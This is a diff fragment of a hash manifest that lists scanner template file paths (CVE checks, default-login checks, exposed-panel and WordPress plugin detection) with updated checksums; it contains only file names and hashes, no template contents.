http/cves/2024/CVE-2024-45488.yaml:e1a7fd8753131abe67ae2c9295bee18112b9a594 http/cves/2024/CVE-2024-45507.yaml:0fba89faecb014ecb7f810822ee27c3e77c50f82 http/cves/2024/CVE-2024-45622.yaml:f22751185098b16cd3d6b473bb5e8c70e692cf11 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 -http/cves/2024/CVE-2024-46310.yaml:8506b45fc32abe572d7264310ece99bc78f47d49 +http/cves/2024/CVE-2024-46310.yaml:23958d09ac2c7e8f15e832b14db03070fdbe6c49 http/cves/2024/CVE-2024-46627.yaml:d780b5a681cf488780944c02cec4510044e7c0f3 http/cves/2024/CVE-2024-46986.yaml:50b477103c918decc4e15628a782b2db1b541d21 http/cves/2024/CVE-2024-47062.yaml:db115f37051cb80bcabe02cc001b5aa19a7e17e8 @@ -3910,6 +3911,7 @@ http/cves/2024/CVE-2024-8484.yaml:5a5e6dc7cf8c79a52b84fe3442f84a0e6794fe95 http/cves/2024/CVE-2024-8503.yaml:da8ca95b4f0cc45dd9feebaf1fae92bcbff76a17 http/cves/2024/CVE-2024-8517.yaml:640de66acc51d345455036b12592362ed66f3aa7 http/cves/2024/CVE-2024-8522.yaml:e0ede27034e3e6e3e907211f527f9213d08d2a52 +http/cves/2024/CVE-2024-8698.yaml:37d9461b2ea667776258bc9c22d3e8cffe0b2c43 http/cves/2024/CVE-2024-8752.yaml:f0f9dca783b57c1fd5e47592e224f888d47c1747 http/cves/2024/CVE-2024-8877.yaml:d5b12c9a0e91fabea84efd078485f4fd57703738 http/cves/2024/CVE-2024-8883.yaml:e02b12d824d8f4df3edd0ee981eb0284215409dd @@ -4135,7 +4137,7 @@ http/default-logins/xui/xui-default-login.yaml:5660b7501aa89f9905c2658ecb95886bd http/default-logins/xxljob/xxljob-default-login.yaml:3cf8e51b48310ab30bb81c4c361669425f6c98ce http/default-logins/yealink/yealink-default-login.yaml:1c09abc636a37838c637cc287040bde60590b27f http/default-logins/zabbix/zabbix-default-login.yaml:039c6303b088546c9f54e85481d65de7927262e4 -http/default-logins/zebra/zebra-printer-default-login.yaml:b027865ce67e3db759efd35bd0b111eb2918fb90 +http/default-logins/zebra/zebra-printer-default-login.yaml:dc07b59b532cd36b62dd38a49630e1de6e9216f2 http/default-logins/zmanda/zmanda-default-login.yaml:8c81afd379909dea4700a9204c4f38a9b2c0df17 http/exposed-panels/3cx-phone-management-panel.yaml:e7a814bb90b5ad57f2e4e643f7a87496a92dad8e http/exposed-panels/3cx-phone-webclient-management-panel.yaml:e0c9fdfc6a9ea4d1daece9ef526d481f672b4a6a @@ -5091,7 +5093,7 @@ http/exposed-panels/splunk-login.yaml:f3e0a45635ae22edbadc7414cde11fbeefa707a3 http/exposed-panels/spotweb-login-panel.yaml:ef2c79cd15421375ea22ff53853d80ccb11ae74f http/exposed-panels/sql-monitor.yaml:fb0303396ff02182a78cabd32ae3dd2790d91c81 http/exposed-panels/sqlbuddy-panel.yaml:724ba7d0ed925078c2079fd18c571d79f050ae3e -http/exposed-panels/sqlpad-panel.yaml:a3a1d953960f2f247de926909f4ab46f4c8397e1 +http/exposed-panels/sqlpad-panel.yaml:baf898bada508af75ef5167542749fe235b7af96 http/exposed-panels/squirrelmail-login.yaml:037423949a80a46bbc5253485adb10b1dbca5a63 http/exposed-panels/sqwebmail-login-panel.yaml:0523634e1e94d7e80c7f030baf2ba7a338ebf39f http/exposed-panels/star-network-utility.yaml:99d8030add9fc52037185ac6767bc9dc72f5b495 @@ -5187,7 +5189,7 @@ http/exposed-panels/untangle-admin-login.yaml:df482c1a46cc23c86002e826efb080f37b http/exposed-panels/uptime-kuma-panel.yaml:3b472ba900fc248803a4a228fb5404c6ab0d327a http/exposed-panels/urbackup-panel.yaml:5a96d57a9312c091ba097e4239ace635d0cdf488 http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d -http/exposed-panels/usermin-panel.yaml:cf04a87b1066671fc35a1a89cfc0bd7fc569c4ce +http/exposed-panels/usermin-panel.yaml:4e2cfc691c0e71ba971883868ad5060d40dea2ef http/exposed-panels/v2924-admin-panel.yaml:20b0e24a3e6804139f1be474610304e31c942d3f http/exposed-panels/vault-panel.yaml:950157a5be3ba33db5de5a0856864cec82f96eb7 http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688e6c75bbe1b @@ -7846,236 +7848,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:143cc12289140ccfd3b3ff43a7a7147ed9c0e41b -http/technologies/wordpress/plugins/add-to-any.yaml:c4392fb04bcec21c47ff5a360ed6b77b0dfb906e -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8e0c14e1537506a3946485f280d8d251f636f543 +http/technologies/wordpress/plugins/ad-inserter.yaml:241ace293485e7463e714ced7ecf762198431061 +http/technologies/wordpress/plugins/add-to-any.yaml:89aea701a666d37aeed8f43b333ae38f7b422300 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:4c6ad45585040ccec3c9e6cfca34de94ece14ef2 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:83daa6376263cc48c57bd427187c915541044b87 -http/technologies/wordpress/plugins/akismet.yaml:7df9d2db6ae85af86c01ea94cd92ea842532a2d7 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3defca7cccc93cc3dd1c2168c3d1a984355fe0b4 +http/technologies/wordpress/plugins/akismet.yaml:78e30610fa5dc63d9cc25ee929781c269bd59692 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:4295d780b9b472531315521f36b40d8d34469d9f -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:af857fc21a1d2fc411a723c3fc4e107e4b2776fc -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:9aa5a04a00dc2ff234689d927c7a8a4f87592927 -http/technologies/wordpress/plugins/amp.yaml:a11efff1e6219b27508230c1fe5425488f560dda -http/technologies/wordpress/plugins/antispam-bee.yaml:45d83207379ad8570fe9bd6a572e579bde36a195 -http/technologies/wordpress/plugins/astra-sites.yaml:0464427d5dafba1e409c387f09e45887d4306278 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:ae159bca36051e0e1777971c2eeacd6aaaf8d0b2 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:5752804ff7f32d1c9c1d73eb20dfe2d7ecdb28c8 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:35575777bef3c072976b72403b556f65a87f4a24 +http/technologies/wordpress/plugins/amp.yaml:763fe590f8e1231a76a46ec9cbc47eca527eade7 +http/technologies/wordpress/plugins/antispam-bee.yaml:a05c95a54222fc9d3c4a0812a044a657911fbeda +http/technologies/wordpress/plugins/astra-sites.yaml:f898a234420f82e8993bba0e5f387c7875b54d85 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:964800330d539a6b02cfb757e39497128f360de1 -http/technologies/wordpress/plugins/backwpup.yaml:f879a1b2fc5d325f758a37d8098cbbd8fdd3c99c -http/technologies/wordpress/plugins/better-search-replace.yaml:cb8cc39c383949ed356df080359e9bd77d41b938 -http/technologies/wordpress/plugins/better-wp-security.yaml:a6ea66750460a1229d395826e2f6bebfbb687f56 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:3cd4db993d5de45451422dddb9f78fe1fab9180e -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:6272a845891e3593cf770814625a97f8bc31b8c5 -http/technologies/wordpress/plugins/breeze.yaml:00a0190ce18d5cee4417a6b70ef6b93190a2642f -http/technologies/wordpress/plugins/broken-link-checker.yaml:e497d4c2913f415a3d70f15e155e90bf820994ea +http/technologies/wordpress/plugins/autoptimize.yaml:972e1bca0d74a8257323b5447a41011fe1b077ac +http/technologies/wordpress/plugins/backwpup.yaml:8a2583cf3eb9c5043d2591ba4a628356b61c0446 +http/technologies/wordpress/plugins/better-search-replace.yaml:b6b17812360a2aca9f34a929bc023be6a72c10b3 +http/technologies/wordpress/plugins/better-wp-security.yaml:20ea63b40ae8ae189481ad592a4d63439cc5dcb0 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:b4ab0347dc5f62b47152481d93268220c42bb850 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:97b41f9dc699bcc1d3b4d647298b6bf71ca6194e +http/technologies/wordpress/plugins/breeze.yaml:d4ff53676c73696a97a0a6f4ab1b143c30bf9927 +http/technologies/wordpress/plugins/broken-link-checker.yaml:8d5d8ecc679a1780071d4a9ddc4d1badcc61eaeb http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:a81a5ecea34fdf0c05eef1eebf62ac4bba8efb77 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:acec5d612b2fa6205ac21c6c3de690c4a6609f5b -http/technologies/wordpress/plugins/classic-editor.yaml:42b74101a57600a16a51cdabe48a37029e54e6fb -http/technologies/wordpress/plugins/classic-widgets.yaml:6436655bb9b35204383b6acf53284cccfee52a0d -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:f1ed1902a0336901374c3ef529fde1dfeda9b7a3 +http/technologies/wordpress/plugins/chaty.yaml:b6b51fa70d30d024dc9084b7351353def4c0aa0b +http/technologies/wordpress/plugins/child-theme-configurator.yaml:f8e446b8fd61d48cc93e5fa6671ae9cc819ea40f +http/technologies/wordpress/plugins/classic-editor.yaml:7197221e5a4f0a20eb25a2e194e2c410fcc73c70 +http/technologies/wordpress/plugins/classic-widgets.yaml:05e2ba2ed65d51b3b0e27bb6dc0eecf432c014f0 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:8cf97bb7f38f8884af103f8bcd76dc4f6e05b9f3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:3c286a547d1fe662dbc97b52f804f4843fe9fba0 -http/technologies/wordpress/plugins/coblocks.yaml:17fcf47d6aba48ea4571424e8d028722867a5384 -http/technologies/wordpress/plugins/code-snippets.yaml:383f6d784225a450de0039efa568ef7bb3bd5f2e -http/technologies/wordpress/plugins/coming-soon.yaml:629ccedbc60df48905d0439a8effa60e4319f992 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:ff31286e2a468140af17b724c2db59e40202531e -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:096eef3d10ce53b8b350a1f2645ec4371b3f391b -http/technologies/wordpress/plugins/contact-form-7.yaml:3ca774899c053e9d1967620b070a6b093aeddcdc -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:1b766de38287ac6ccd4e9a412fc1692791dae968 -http/technologies/wordpress/plugins/cookie-law-info.yaml:eaa51adf9396352004aed4038834ff4ecea9a699 -http/technologies/wordpress/plugins/cookie-notice.yaml:5449984ee332e3d8627226ab20203ae8848aa5f4 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:1a1e88bf37335369c884f5aa77572866e9568a30 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:d21a9732a599b3f4f434fd1413426eed8d32b6aa -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:797fa631b3cae3be5e06065ce2ef7d63478da94d -http/technologies/wordpress/plugins/custom-css-js.yaml:c46185960bf6f5325c417bf03ef48818deb6eb6a -http/technologies/wordpress/plugins/custom-fonts.yaml:dc4cc5660d8cb21ee84ec180265a53b273fbfee5 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f187288ac06c8fc843fef4ac141d41a7fc1812f3 -http/technologies/wordpress/plugins/disable-comments.yaml:1459bcc258ff98535bcc6c9c767888bdc0b92df6 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:080201eb95093ed96752ded9757138098aed6f6d -http/technologies/wordpress/plugins/duplicate-page.yaml:0853241b9fc1f902833aaa6f07511bc66111c4b2 -http/technologies/wordpress/plugins/duplicate-post.yaml:aac44471587f77369fac34bf890f3d50727d8eab -http/technologies/wordpress/plugins/duplicator.yaml:cf57d8b0192847a8417a73da363d490c18fb8c62 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f979ed98bbb93bbf54f377d327ecdf5f3eb68dd8 +http/technologies/wordpress/plugins/cmb2.yaml:4307a6b7ccc4592ad78d35a7f8ac50a9de80908d +http/technologies/wordpress/plugins/coblocks.yaml:2ec036d5203692bd21e21e5389251547089a5d72 +http/technologies/wordpress/plugins/code-snippets.yaml:48c112708ece2bd553db58941f3f0dcec60c1f4c +http/technologies/wordpress/plugins/coming-soon.yaml:6e614503168994a23e4acbc6d7df3a268b919da9 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:4d06f09c81cdbce0fb3fe24cbabdcc06063a5815 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:d0d5c71c883c4b5647cbbfbe11117b56d705766a +http/technologies/wordpress/plugins/contact-form-7.yaml:12d897c74322e58fa66e1a42f6d2f31b8a677b65 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:1a8721531b5dc8b963c7663cbb090aad6b9bc5e7 +http/technologies/wordpress/plugins/cookie-law-info.yaml:167736768bd7d0c57976e613c29fbd2bacf7d04c +http/technologies/wordpress/plugins/cookie-notice.yaml:0d4404f3752245a55a3a3bb602cd6877daa87ec6 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:1ff81e9cb112135673bf7cfc2dc77050de173abc +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:8cafd3014be8ccca6a6bbe4a9ff3515fc579abfc +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:b5296ac83bc439ee5fe686f0a6482069ff6e414d +http/technologies/wordpress/plugins/custom-css-js.yaml:bcd313bac603e54705afabb434c8e1ece63340f3 +http/technologies/wordpress/plugins/custom-fonts.yaml:4ad51cb5614d70ec5e83b1dc27614a1cda4eb3f6 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:8566835efae56ff003bc0ce3d71eb8f244cc89eb +http/technologies/wordpress/plugins/disable-comments.yaml:cbf303434a159f2586b204e401a38f5f0aa859c4 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:516e0a6cd66c22c20eaa6bac641146b1813d11d8 +http/technologies/wordpress/plugins/duplicate-page.yaml:1d64287a35f3d04173a0e209d0d75a0a5f95ddcc +http/technologies/wordpress/plugins/duplicate-post.yaml:84bd8da59a686ff3c12b79c0bd11f305508f0588 +http/technologies/wordpress/plugins/duplicator.yaml:128d24fe09fc06b2d3cd5d2ac32e7ec226f122f2 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f737784f0c3d3fb2c93a99c1ff95e746df985518 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:7b570aa0ddc9e1a5fb4e30d9aec562923844101a -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:5f5f2b3fa3e574db9d31655bdaea6c71205065a5 -http/technologies/wordpress/plugins/elementor.yaml:ddb990018771ad8c8d8188aa7de601063bcd20a1 -http/technologies/wordpress/plugins/elementskit-lite.yaml:30d3a29467eb000e892575a2904de3ca220173b2 -http/technologies/wordpress/plugins/enable-media-replace.yaml:102842cbd8a29d21b57fe803e00cda192ab0be0f -http/technologies/wordpress/plugins/envato-elements.yaml:ed4d5e13bfb4826b30f6e92db8cf4d9b17a9e571 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:cb79ebe98b3ce95fd28c42bddb05a1ad254f9ee3 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:83b9ef8fcc56a36696d5b35dffb291513db5c997 -http/technologies/wordpress/plugins/extendify.yaml:f1153c7cb229d03668ec4668f18ae0fc09c2a409 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:d13f9c5e30adb0534f20edf8a653318bd00a3c16 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:667dc2b7280d4c9074f51eda7595cc31aa9fb2f5 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:76d3b2ae157b8661a05b48e98ff3ee910c2503d5 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:485648a4d4ed017de57c15a82cf26ee70fda4209 +http/technologies/wordpress/plugins/elementor.yaml:4b12923edc9d6274ef191b8474d3f237da2d9ac3 +http/technologies/wordpress/plugins/elementskit-lite.yaml:95fe1cd7b789934cc7a502c8a45f21386c3b8e58 +http/technologies/wordpress/plugins/enable-media-replace.yaml:476ffcc535b88558c17dd0fb5c3da46532d90064 +http/technologies/wordpress/plugins/envato-elements.yaml:92e12e89a5e22c2f46f1318fb18a0defca61268f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:b677cf8e538acc1723b67159371e8c9ef2fe5214 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:8da93f07a3e554cfd26ff6a8b3112c56c1e40a2d +http/technologies/wordpress/plugins/extendify.yaml:fe0a31106f0fb48e6d03ed1ba48ee38126c98b9d +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:cf75bf5892513b9da15c05a0a89c8a597bf04d29 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:bb0aca694d39f627d557bb2cf67fc2d3770903c3 http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:55febd7249bb43dd05cf5bcc2c096b11ed2dd2f9 -http/technologies/wordpress/plugins/flamingo.yaml:dc6c8b6a689d5d98c23d3b67487b7c8f40ac050d -http/technologies/wordpress/plugins/fluent-smtp.yaml:eb3c323693256861d2fd490e3f913ef7baee9f3a -http/technologies/wordpress/plugins/fluentform.yaml:3b3983a1e2794200b614265c67e8b1cfd28cbaea -http/technologies/wordpress/plugins/font-awesome.yaml:4d5a973ae1ce6f865e103c9d6bceee8d74b139f2 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:4b25ad41c9dca421789ff42f469d78170d428912 -http/technologies/wordpress/plugins/formidable.yaml:3aa3e2074f5d8a5b508a72721d6f8a4563bce2c6 -http/technologies/wordpress/plugins/forminator.yaml:89ff115c05980ae36f8d02adc7c26e0cd91583b6 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:03a211e3ab83e47e066dc155ec58edbedffdbc58 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:3b4e705264305caf2737782f0131a11c13f0422e +http/technologies/wordpress/plugins/flamingo.yaml:5bc719374ff8c4082be905917b5dc7957c225002 +http/technologies/wordpress/plugins/fluent-smtp.yaml:007305578df2cd842e43a934470550003ff01993 +http/technologies/wordpress/plugins/fluentform.yaml:c294697f4cac50c8551c6eaccef63c9d07501e81 +http/technologies/wordpress/plugins/font-awesome.yaml:add6cfd0bcf17e65507d07a94ffb5ac3ffcb506e +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:b4839ee773065ebaf1ec1b0ef4d49dd287d52aeb +http/technologies/wordpress/plugins/formidable.yaml:5b2defd857dd1208f14f0343f59617829c49656e +http/technologies/wordpress/plugins/forminator.yaml:db27d5c959f612a5bffafc5be6eb9ec783db0bce +http/technologies/wordpress/plugins/ga-google-analytics.yaml:657cb78ad927a8c42a252e3c02a4afc0e13ced75 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:1fa12077580b16db96df19a4a462268274893a56 http/technologies/wordpress/plugins/give.yaml:fc2d82b805174c1b02d60efd47f286cc8d3aceb5 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:056d7b8b1afbe48869dce6091c87521f35ee839e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:3a03a9245b1042183a9dd35db3a0f7f5795940a0 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:9a22b2028fb0cf4550c038f235c49641abb18fe5 -http/technologies/wordpress/plugins/google-site-kit.yaml:32b24a766151c4b56490b7387a4378b54c3ac81c -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:6ebe7945994ff0e64b0410fa5e53a3ca7e929944 -http/technologies/wordpress/plugins/gtranslate.yaml:4d524eb9fa6fe60fd6c817794830c68c54e5b4ea -http/technologies/wordpress/plugins/gutenberg.yaml:181c1b213c2663d4d293b82f22a32c574d7b7ddc -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:5bd80dc4a15bf99a36eccd77c2f7e6f49340bd20 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:df273b60bc7bcf8c28a00eb02727168a93254320 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:a54075ecb0d7ac15c592bbef6736d286f9f4ca4d +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:c8b72fce7a82840ec55c4819eb9e1e9ace05c128 +http/technologies/wordpress/plugins/google-site-kit.yaml:656fa86b91f4c350b298c80044ed4b0ee756bf29 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:6031c46398b000322ae1206da1521c633bf2140b +http/technologies/wordpress/plugins/gtranslate.yaml:1386ca258e0a3c1c20dacf8695778ebcbf01d596 +http/technologies/wordpress/plugins/gutenberg.yaml:b080bf82079aad489a809f440961578ec7c73d3e +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:9101671890123ec675516ece7434a4b973729b2e http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:ccff30863c18f64296cdef268b4df44a0a8afaf2 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:dd69233ce1b9900da7bf6f5fbe7a08619f529395 -http/technologies/wordpress/plugins/header-footer.yaml:233f55b73e20c0705684bc432ee70213bc02826e -http/technologies/wordpress/plugins/health-check.yaml:5f8ff932c18f2c242d16c590cbdf6e4b04812e61 -http/technologies/wordpress/plugins/hello-dolly.yaml:89680e8c58c51db178688efd91811198138df030 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:87593452ac76bff463359eabbf2eb598a7f9ad8b -http/technologies/wordpress/plugins/hostinger.yaml:2a4532819b78357d4fc4e398a90096e129f68c95 -http/technologies/wordpress/plugins/image-optimization.yaml:92d555e6b0bbd6b013d540b4193337f306f4d2b5 -http/technologies/wordpress/plugins/imagify.yaml:14e470f789410b07e2308dd2f9d7238155f93f05 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:3fab4bcc19dc772f251b4420fb821b03de3f5ea3 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:a6fe66728fccf0c628bd522fbde23cebc972fbd1 +http/technologies/wordpress/plugins/header-footer.yaml:52683ee8662a1037826df383b9cbd3dd4db7eaf0 +http/technologies/wordpress/plugins/health-check.yaml:5582e3b2ea38acddfd2070f8b42addeb5a6b2cba +http/technologies/wordpress/plugins/hello-dolly.yaml:78abb80605598896050344ab612d934fda468b32 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:7c4333c13f7ed1bb881e62773e1ee511c576a8ee +http/technologies/wordpress/plugins/hostinger.yaml:733c50abd14043a58557ae4417722c5cc0bae450 +http/technologies/wordpress/plugins/image-optimization.yaml:909dff60767eb8641050e5dadea45f4c127d1723 +http/technologies/wordpress/plugins/imagify.yaml:c3bbeb9132d08c1fc04d46890fec470e6e68375c http/technologies/wordpress/plugins/imsanity.yaml:319c06bed3d7611b6a05e2aaa77fb998a3205778 http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml:7544703f23942190d32f575fe3f4b1398dfa3260 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:11af5ee002c31fe529de4d21dd56b914f8b57c16 -http/technologies/wordpress/plugins/instagram-feed.yaml:5102f1d994f9ce6d600ec06c3e420ba0c590739e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:c16a8a901698998daaeea7d1c47f39dcdb8e7911 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:c6f2b306618b94712ba9899c59abd2f132b65d59 +http/technologies/wordpress/plugins/instagram-feed.yaml:bbf7b9ecbd2bcb59ad628093c00ef4e77c084a3e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:67be9a70df16145cc1a04118adfa79960a41b0fd http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:ac920e5fd6d7fe1620d7d0c27c3a2584df6889f6 -http/technologies/wordpress/plugins/jetpack.yaml:83f7816dfcf7931e667cce07f680882601ea4818 -http/technologies/wordpress/plugins/kadence-blocks.yaml:d14caa5611b7b66cdfa9a5f9dee2ae1098f0348a -http/technologies/wordpress/plugins/kirki.yaml:f10a1d3ad57415494954cc3023b7832a962cc3f6 -http/technologies/wordpress/plugins/leadin.yaml:dcaa5495b4a7074e0b25c26193375dcc7ca1d4d5 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:74656a111ae9b7aa45840db830bb37fa7520cd3a -http/technologies/wordpress/plugins/limit-login-attempts.yaml:00c8d37fabe25ecc50a211ae2602d3a3096858c3 -http/technologies/wordpress/plugins/litespeed-cache.yaml:af80a09b0cd496cf28223e480e6557cce58c25ce -http/technologies/wordpress/plugins/loco-translate.yaml:04dceb4582be6e2ed8433d3262a7c5adfc49e7df -http/technologies/wordpress/plugins/loginizer.yaml:bc63aa405c52ac2ca208fe1287571f6a9137be0c +http/technologies/wordpress/plugins/jetpack-boost.yaml:90a9c55c83e43fcf43591bf6ad6ec02df476ecc4 +http/technologies/wordpress/plugins/jetpack.yaml:1dddbd68e438e49934a3b9920696bb9bd44c5967 +http/technologies/wordpress/plugins/kadence-blocks.yaml:db53045e7425c20c35a0d8b95d2bfcacf6235564 +http/technologies/wordpress/plugins/kirki.yaml:ef3b569982b6846161d6f694792cb11757e51bd2 +http/technologies/wordpress/plugins/leadin.yaml:5de71451ac15544e8585f3cb0dd225add0788576 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:5b73dc5c61f5c6fac4a5ee653fb36031acfc8e49 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:13d8920e4751d7004a149c458dfaad4f10dfc539 +http/technologies/wordpress/plugins/litespeed-cache.yaml:7a2d91599ba6d5f1dd6775691c289e0b2ce523e4 +http/technologies/wordpress/plugins/loco-translate.yaml:c964e2e1c21c575259da83de6e7534a10ab5c247 +http/technologies/wordpress/plugins/loginizer.yaml:e94cb30d1924b86c71ef73d25775551c513a589d http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:a6142088e99a084475dab84887b0db8be0457b19 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:ed4ce2a39d8888755ec499bcf49a8aa6cb1817e0 -http/technologies/wordpress/plugins/mailpoet.yaml:1564298bee8b1436ab1a772361ee910bd56a6687 -http/technologies/wordpress/plugins/maintenance.yaml:88efe1343890f65ca1fe5b968124534b17efb595 -http/technologies/wordpress/plugins/mainwp-child.yaml:897211bda8ba19d307a3e5bfa0a24154475195b8 -http/technologies/wordpress/plugins/malcare-security.yaml:4b1fc042838b57e0b272ce3349a67af2d682c60e -http/technologies/wordpress/plugins/megamenu.yaml:7c694e3c7895905af50e29ea556a15c6b3c8fad7 -http/technologies/wordpress/plugins/members.yaml:bba0b0ae4f3af85d5ad23c9baec6d63372eff35c -http/technologies/wordpress/plugins/meta-box.yaml:56a60fac7c70dc6b600546fe5024a4a6a0dc188a -http/technologies/wordpress/plugins/metform.yaml:7fa02cdbb38c4cefbcea5521cedbcc3fa41d3a9b -http/technologies/wordpress/plugins/ml-slider.yaml:a9966ca5c780375d26330ef98879e693045dd0b8 -http/technologies/wordpress/plugins/newsletter.yaml:663b4d88e93c6f7ac1d8660b4d8dda07ac297ccd -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:8c3c4047d133e402525da574200c6e0c0ba7e0ec -http/technologies/wordpress/plugins/nextgen-gallery.yaml:c451c5af4795fe8f4f4176d1662c674b1c0734e6 -http/technologies/wordpress/plugins/ninja-forms.yaml:7723a5aa454919323b8b11a125c32857a0930b97 -http/technologies/wordpress/plugins/ocean-extra.yaml:33ee4b98735c233736c903a9e9c9c8a602fd34e3 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:287e7afb798a403de0fec75b52420dfaf4290f1e -http/technologies/wordpress/plugins/one-click-demo-import.yaml:f550ed6bf4b44259c5d0fe08b7d4f3db8a52e62d -http/technologies/wordpress/plugins/optinmonster.yaml:f58759a8e113be05ccfc8e695c32828e206f4bf8 -http/technologies/wordpress/plugins/otter-blocks.yaml:c323cfd95a92313cb0f4a315d62c2a454e1bc66a -http/technologies/wordpress/plugins/password-protected.yaml:fe8c50d93268582c151d57b15222b9613ea819b0 -http/technologies/wordpress/plugins/pdf-embedder.yaml:9cfd8c2c2690706f7f43dbfacfb4f8f88f35e2b6 